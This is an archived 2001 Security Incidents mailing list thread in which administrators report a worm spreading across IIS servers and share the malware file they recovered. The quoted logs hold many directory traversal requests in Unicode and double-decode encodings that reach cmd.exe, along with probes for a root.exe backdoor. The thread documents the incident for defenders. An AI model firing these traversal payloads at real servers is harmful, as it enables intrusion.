Security Incidents mailing list archives
Re: CodeBlue finally hitting, or what?
From: Eric Jacobsen <jacobsen () bu edu>
Date: Tue, 18 Sep 2001 11:26:24 -0400
We're seeing much of the same traffic. We've recovered a file called Admin.dll from the /scripts directory in the web tree. This file was copied there by means of tftp and then executed with a second web request. Crude analysis of Admin.dll shows that it's calling itself: "Concept Virus(CV) V.5, Copyright(C)2001 R.P.China" I'll provide more information later when I've had a chance to examine it more intently. Eric Jacobsen jacobsen () bu edu "Portnoy, Gary" wrote:
Greetings, I am suddenly seeing hundreds of Unicode traversal requests coming in from all over the world, many of them from previous CodeRed victims. I am guessing someone changed CodeBlue to make it spread faster, because before I saw maybe 1 or 2 CodeBlue attempts a day, and so far i've seen at least 20 in the last hour. Just a a way to help fingerprint it, a few of the attempted exploits use the multiple decode vulnerability.... -Gary- 12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy stem32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:17:01 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-" Gary Portnoy Network Administrator gportnoy () belenosinc com PGP Fingerprint: 9D69 6A39 642D 78FD 207C 307D B37D E01A 2E89 9D2C ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- CodeBlue finally hitting, or what? Portnoy, Gary (Sep 18)
- Re: CodeBlue finally hitting, or what? Eric Jacobsen (Sep 18)
- Re: CodeBlue finally hitting, or what? Jason Giglio (Sep 18)
- Re: CodeBlue finally hitting, or what? Tracey Losco (Sep 18)
- Re: CodeBlue finally hitting, or what? Nick FitzGerald (Sep 18)
- <Possible follow-ups>
- RE: CodeBlue finally hitting, or what? Becky Pinkard (Sep 18)